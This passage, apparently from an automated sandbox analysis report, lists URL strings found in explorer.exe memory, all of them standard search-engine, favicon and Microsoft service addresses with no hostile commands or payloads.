          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000007.00000000.2138753603.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000007.00000000.2168339499.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2149028138.0000000004297000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2180035893.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000007.00000000.2138753603.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
